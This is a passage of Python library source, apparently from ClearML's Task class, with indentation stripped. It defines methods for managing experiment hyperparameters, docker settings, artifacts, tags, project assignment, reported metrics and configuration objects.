def get_parameters(self, backwards_compatibility=True):
# type: (bool) -> (Optional[dict])
"""
Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not
support parameter descriptions (the result is a dictionary of key-value pairs).
Notice the returned parameter dict is flat:
i.e. {'Args/param': 'value'} is the argument "param" from section "Args"
:param backwards_compatibility: If True (default) parameters without section name
(API version < 2.9, clearml-server < 0.16) will be at dict root level.
If False, parameters without section name, will be nested under "Args/" key.
:return: dict of the task parameters, all flattened to key/value.
Different sections with key prefix "section/"
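A minimal usage sketch (assuming ``task`` is an existing instance of this class and an "Args/batch_size" parameter exists):
.. code-block:: py
params = task.get_parameters()
batch_size = params.get('Args/batch_size')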
"""
if not Session.check_min_api_version('2.9'):
return self._get_task_property('execution.parameters')
# the API will make sure we get old parameters with type 'legacy' at the top level (instead of nested in Args)
parameters = dict()
hyperparams = self._get_task_property('hyperparams') or {}
if not backwards_compatibility:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
parameters['{}/{}'.format(section, key)] = section_param.value
else:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ):
parameters['{}'.format(key)] = section_param.value
else:
parameters['{}/{}'.format(section, key)] = section_param.value
return parameters
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
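A minimal usage sketch (assuming ``task`` is an existing instance of this class; parameter names are illustrative):
.. code-block:: py
task.set_parameters({'Args/batch_size': 64, 'Args/epochs': 10})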
"""
return self._set_parameters(*args, __update=False, **kwargs)
def _set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
def stringify(value):
# return empty string if value is None
if value is None:
return ""
str_value = str(value)
if isinstance(value, (tuple, list, dict)):
if 'None' in re.split(r'[ ,\[\]{}()]', str_value):
# If we have None in the string we have to use json to replace it with null,
# otherwise we end up with None as string when running remotely
try:
str_json = json.dumps(value)
# verify we actually have a null in the string, otherwise prefer the str cast
# This is because we prefer to have \' as in str and not \" used in json
if 'null' in re.split(r'[ ,\[\]{}()]', str_json):
return str_json
except TypeError:
# if we somehow failed to json serialize, revert to previous std casting
pass
elif any('\\' in str(v) for v in value):
try:
str_json = json.dumps(value)
return str_json
except TypeError:
pass
return str_value
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
prefix = kwargs.pop('__parameters_prefix', None)
descriptions = kwargs.pop('__parameters_descriptions', None) or dict()
params_types = kwargs.pop('__parameters_types', None) or dict()
update = kwargs.pop('__update', False)
# new parameters dict
new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
new_parameters.update(kwargs)
if prefix:
prefix = prefix.strip('/')
new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items())
# verify parameters type:
not_allowed = {
k: type(v).__name__
for k, v in new_parameters.items()
if not verify_basic_type(v, self._parameters_allowed_types)
}
if not_allowed:
self.log.warning(
"Skipping parameter: {}, only builtin types are supported ({})".format(
', '.join('%s[%s]' % p for p in not_allowed.items()),
', '.join(t.__name__ for t in self._parameters_allowed_types))
)
new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed}
use_hyperparams = Session.check_min_api_version('2.9')
with self._edit_lock:
self.reload()
# if we have a specific prefix, we use hyperparameters, and we use set (not update),
# overwrite only the prefix section and leave the rest as is.
if not update and prefix:
parameters = copy(self.get_parameters() or {})
parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/'))
elif update:
parameters = copy(self.get_parameters() or {})
else:
parameters = dict()
parameters.update(new_parameters)
if use_hyperparams:
# build nested dict from flat parameters dict:
org_hyperparams = self.data.hyperparams or {}
hyperparams = dict()
# if the task is a legacy task, we should put everything back under Args/key with legacy type
legacy_name = self._legacy_parameters_section_name
org_legacy_section = org_hyperparams.get(legacy_name, dict())
for k, v in parameters.items():
# legacy variable
if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy':
section = hyperparams.get(legacy_name, dict())
section[k] = copy(org_legacy_section[k])
section[k].value = stringify(v)
description = descriptions.get(k)
if description:
section[k].description = description
hyperparams[legacy_name] = section
continue
org_k = k
if '/' not in k:
k = '{}/{}'.format(self._default_configuration_section_name, k)
section_name, key = k.split('/', 1)
section = hyperparams.get(section_name, dict())
org_param = org_hyperparams.get(section_name, dict()).get(key, None)
param_type = params_types[org_k] if org_k in params_types else (
org_param.type if org_param is not None else type(v) if v is not None else None
)
if param_type and not isinstance(param_type, str):
param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type)
section[key] = tasks.ParamsItem(
section=section_name, name=key,
value=stringify(v),
description=descriptions[org_k] if org_k in descriptions else (
org_param.description if org_param is not None else None
),
type=param_type,
)
hyperparams[section_name] = section
self._edit(hyperparams=hyperparams)
self.data.hyperparams = hyperparams
else:
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: stringify(v) for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None, value_type=None):
# type: (str, str, Optional[str], Optional[Any]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
:param value_type: The type of the parameters (cast to string and store)
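A minimal usage sketch (assuming ``task`` is an existing instance of this class; the parameter name is illustrative):
.. code-block:: py
task.set_parameter('Args/learning_rate', 0.001, description='optimizer step size', value_type=float)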
"""
if not Session.check_min_api_version('2.9'):
# not supported yet
description = None
value_type = None
self._set_parameters(
{name: value}, __update=True,
__parameters_descriptions={name: description},
__parameters_types={name: value_type}
)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def delete_parameter(self, name):
# type: (str) -> bool
"""
Delete a parameter by its full name, i.e. Section/name.
:param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size'
:return: True if the parameter was deleted successfully
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Delete hyper-parameter is not supported by your clearml-server, "
"upgrade to the latest version")
with self._edit_lock:
paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1])
res = self.send(tasks.DeleteHyperParamsRequest(
task=self.id, hyperparams=[paramkey]), raise_on_errors=False)
self.reload()
return res.ok()
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self._set_parameters(*args, __update=True, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists() and not DOCKER_BASH_SETUP_ENV_VAR.exists():
return
self.set_base_docker(
docker_cmd=DOCKER_IMAGE_ENV_VAR.get(default=""),
docker_setup_bash_script=DOCKER_BASH_SETUP_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd, docker_arguments=None, docker_setup_bash_script=None):
# type: (str, Optional[Union[str, Sequence[str]]], Optional[Union[str, Sequence[str]]]) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely the call is ignored
:param docker_cmd: docker container image (example: 'nvidia/cuda:11.1')
:param docker_arguments: docker execution parameters (example: '-e ENV=1')
:param docker_setup_bash_script: bash script to run at the
beginning of the docker before launching the Task itself. example: ['apt update', 'apt-get install -y gcc']
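A minimal usage sketch (assuming ``task`` is an existing instance of this class; image and arguments are illustrative):
.. code-block:: py
task.set_base_docker(docker_cmd='nvidia/cuda:11.1', docker_arguments='-e MY_ENV=1')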
"""
image = docker_cmd.split(' ')[0] if docker_cmd else ''
if not docker_arguments and docker_cmd:
docker_arguments = docker_cmd.split(' ')[1:] if len(docker_cmd.split(' ')) > 1 else ''
arguments = (docker_arguments if isinstance(docker_arguments, str) else ' '.join(docker_arguments)) \
if docker_arguments else ''
if docker_setup_bash_script:
setup_shell_script = docker_setup_bash_script \
if isinstance(docker_setup_bash_script, str) else '\n'.join(docker_setup_bash_script)
else:
setup_shell_script = ''
with self._edit_lock:
self.reload()
if Session.check_min_api_version("2.13"):
self.data.container = dict(image=image, arguments=arguments, setup_shell_script=setup_shell_script)
self._edit(container=self.data.container)
else:
if setup_shell_script:
raise ValueError(
"Your ClearML-server does not support docker bash script feature, please upgrade.")
execution = self.data.execution
execution.docker_cmd = image + (' {}'.format(arguments) if arguments else '')
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
if Session.check_min_api_version("2.13"):
# backwards compatibility
container = self._get_task_property(
"container", raise_on_error=False, log_on_error=False, default={})
return (container.get('image', '') +
(' {}'.format(container['arguments']) if container.get('arguments', '') else '')) or None
else:
return self._get_task_property("execution.docker_cmd", raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
Set a list of artifacts (tasks.Artifact) on the Task, overwriting existing artifacts with the same key.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts or None if error.
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return execution.artifacts or []
def _add_artifacts(self, artifacts_list):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
List of artifacts (tasks.Artifact) to add to the task.
If an artifact with the same name already exists, it will overwrite the existing artifact.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.AddOrUpdateArtifactsRequest(task=self.task_id, artifacts=artifacts_list, force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.updated:
return None
self.reload()
else:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _delete_artifacts(self, artifact_names):
# type: (Sequence[str]) -> bool
"""
Delete a list of artifacts, by artifact name, from the Task.
:param list artifact_names: list of artifact names
:return: True if successful
"""
if not Session.check_min_api_version('2.3'):
return False
if not isinstance(artifact_names, (list, tuple)):
raise ValueError('Expected artifact names as List[str]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.DeleteArtifactsRequest(
task=self.task_id, artifacts=[{"key": n, "mode": "output"} for n in artifact_names], force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.deleted:
return False
self.reload()
else:
self.reload()
execution = self.data.execution
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in artifact_names]
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
if Session.check_min_api_version('2.9'):
configuration = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
configuration[self._default_configuration_section_name] = tasks.ConfigurationItem(
name=self._default_configuration_section_name, value=str(design))
self._edit(configuration=configuration)
else:
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as a blob of text.
:return: The model configuration as a blob of text.
"""
if Session.check_min_api_version('2.9'):
design = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
if design:
design = design.get(sorted(design.keys())[0]).value or ''
else:
design = self._get_task_property(
"execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id=None, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
# if running remotely and we are the main task, skip setting ourselves.
if self._is_remote_main_task():
return
if not project_id:
assert isinstance(project_name, six.string_types)
res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False)
if not res or not res.response or not res.response.projects or len(res.response.projects) != 1:
return False
project_id = res.response.projects[0].id
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
tags = list(set(tags))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
name = name or ''
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.id
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
comment = comment or ''
self._set_task_property("comment", str(comment))
self._edit(comment=str(comment))
def set_task_type(self, task_type):
# type: (Union[str, Task.TaskTypes]) -> ()
"""
Set the task_type for the Task.
:param task_type: The task_type of the Task (see optional values in TaskTypes).
:type task_type: str or TaskTypes
"""
if not isinstance(task_type, self.TaskTypes):
task_type = self.TaskTypes(task_type)
self._set_task_property("task_type", str(task_type))
self._edit(type=task_type)
def set_archived(self, archive):
# type: (bool) -> ()
"""
Archive the Task or remove it from the archived folder.
:param archive: If True archive the Task, If False make sure it is removed from the archived folder
"""
with self._edit_lock:
system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \
if archive else list(set(self.get_system_tags()) - {self.archived_tag})
self.set_system_tags(system_tags)
def get_archived(self):
# type: () -> bool
"""
Return the Archive state of the Task
:return: If True the Task is archived, otherwise it is not.
"""
return self.archived_tag in self.get_system_tags()
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
.. code-block:: py
task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return the Task status without refreshing the entire Task object (only the status property)
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0, returning all scalars.
With a sample limit, scalar values are averaged inside the sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_plots(
self,
max_iterations=None
):
# type: (...) -> List[dict]
"""
Return a list of all the plots reported for this Task.
Notice the plot data is Plotly-compatible.
.. note::
This call is not cached, any call will retrieve all the plot reports from the back-end.
If the Task has many plots reported, it might take long for the call to return.
Example:
.. code-block:: py
[{
'timestamp': 1636921296370,
'type': 'plot',
'task': '0ce5e89bbe484f428e43e767f1e2bb11',
'iter': 0,
'metric': 'Manual Reporting',
'variant': 'Just a plot',
'plot_str': '{"data": [{"type": "scatter", "mode": "markers", "name": null,
"x": [0.2620246750155817], "y": [0.2620246750155817]}]}',
'@timestamp': '2021-11-14T20:21:42.387Z',
'worker': 'machine-ml',
'plot_len': 6135,
},]
:param int max_iterations: Maximum number of historic plots (iterations from end) to return.
:return: list: List of dicts, each one represents a single plot
"""
# send request
res = self.send(
events.GetTaskPlotsRequest(task=self.id, iters=max_iterations or 1),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return []
response = res.wait()
if not response.ok() or not response.response_data:
return []
return response.response_data.get('plots', [])
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
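A minimal usage sketch (assuming ``task`` is an existing instance of this class):
.. code-block:: py
last_lines = task.get_reported_console_output(number_of_reports=5)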
"""
if Session.check_min_api_version('2.9'):
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
navigate_earlier=True,
batch_size=number_of_reports)
else:
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports)
res = self.send(request)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
def get_configuration_object(self, name):
# type: (str) -> Optional[str]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a text blob (unconstrained text string)
return None if configuration name is not valid
"""
return self._get_configuration_text(name)
def get_configuration_object_as_dict(self, name):
# type: (str) -> Optional[Union[dict, list]]
"""
Get the Task's configuration object section as parsed dictionary
Parsing supports JSON and HOCON, otherwise parse manually with `get_configuration_object()`
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a parsed dict.
return None if configuration name is not valid
"""
return self._get_configuration_dict(name)
def get_configuration_objects(self):
# type: () -> Optional[Mapping[str, str]]
"""
Get all of the Task's configuration objects, each as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:return: The Task's configurations as a
dict (config name as key) and text blob as value (unconstrained text string)
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
return {k: v.value for k, v in configuration.items()}
def set_configuration_object(self, name, config_text=None, description=None, config_type=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[dict, list]]) -> None
"""
Set the Task's configuration object as a blob of text or automatically encoded dictionary/list.
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:param config_text: configuration as a blob of text (unconstrained text string)
usually the content of a configuration file of a sort
:param str description: Configuration section description
:param str config_type: Optional configuration format type
:param dict config_dict: configuration dictionary/list to be encoded using HOCON (JSON-like) into the stored text
Notice: you can either pass `config_text` or `config_dict`, not both
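A minimal usage sketch (assuming ``task`` is an existing instance of this class; the section name and values are illustrative):
.. code-block:: py
task.set_configuration_object(name='preprocessing', config_dict={'resize': 256, 'normalize': True})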
"""
return self._set_configuration(
name=name, description=description, config_type=config_type,
config_text=config_text, config_dict=config_dict)
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@classmethod
def get_project_id(cls, project_name):
# type: (str) -> Optional[str]
"""
Return a project's unique ID (str).
If more than one project matches the project_name, return the last updated project.
If no project matches the requested name, return None.
:return: Project unique ID (str), or None if no project was found.
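A minimal usage sketch (the project name is illustrative):
.. code-block:: py
project_id = Task.get_project_id('examples')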
"""
assert project_name
assert isinstance(project_name, str)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)),
raise_on_errors=False)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()).id for p in res.response.projects][0]
return None
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``clearml-agent`` is not executing it)
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> None
"""
Force the adding of a package to the requirements list. If ``package_version`` is None, use the
installed package version, if found.
Example: Task.add_requirements('tensorflow', '2.4.0')
Example: Task.add_requirements('tensorflow', '>=2.4')
Example: Task.add_requirements('tensorflow') -> use the installed tensorflow version
Example: Task.add_requirements('tensorflow', '') -> no version limit
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.add_requirements() must be called before Task.init()')
cls._force_requirements[str(package_name)] = package_version
@classmethod
def ignore_requirements(cls, package_name):
# type: (str) -> None
"""
Ignore a specific package when auto generating the requirements list.
Example: Task.ignore_requirements('pywin32')
:param str package_name: The package name to remove/ignore from the "Installed Packages" section of the task.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.ignore_requirements() must be called before Task.init()')
cls._ignore_requirements.add(str(package_name))
@classmethod
def force_requirements_env_freeze(cls, force=True, requirements_file=None):
# type: (bool, Optional[Union[str, Path]]) -> None
"""
Force using `pip freeze` / `conda list` to store the full requirements of the active environment
(instead of statically analyzing the running code and listing directly imported packages)
Notice: Must be called before `Task.init` !
:param force: Set force using `pip freeze` flag on/off
:param requirements_file: Optionally pass a requirements.txt file to use
(instead of `pip freeze` or automatic analysis)
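A minimal usage sketch (the requirements file path is illustrative; must be called before ``Task.init``):
.. code-block:: py
Task.force_requirements_env_freeze(force=True, requirements_file='requirements.txt')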
"""
cls._force_use_pip_freeze = requirements_file if requirements_file else bool(force)
@classmethod
def force_store_standalone_script(cls, force=True):
# type: (bool) -> None
"""
Force storing the main python file as a single standalone script, instead of linking with the
local git repository/commit ID.
Notice: Must be called before `Task.init` !
:param force: Set force storing the standalone script on/off
"""
cls._force_store_standalone_script = bool(force)
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _get_last_update(self):
# type: () -> (Optional[datetime])
if self._offline_mode:
return None
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_update']),
).response.tasks
return all_tasks[0].last_update
except Exception:
return None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _set_runtime_properties(self, runtime_properties):
# type: (Mapping[str, str]) -> bool
if not Session.check_min_api_version('2.13') or not runtime_properties:
return False
with self._edit_lock:
self.reload()
current_runtime_properties = self.data.runtime or {}
current_runtime_properties.update(runtime_properties)
# noinspection PyProtectedMember
self._edit(runtime=current_runtime_properties)
return True
def _get_runtime_properties(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version('2.13'):
return dict()
return dict(**self.data.runtime) if self.data.runtime else dict()
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
if Session.check_min_api_version("2.13"):
self._data.models = tasks.TaskModels(input=[], output=[])
self._data.container = dict()
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.13'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict(),
container=self._data.container, models=self._data.models)
elif Session.check_min_api_version('2.9'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict())
elif Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
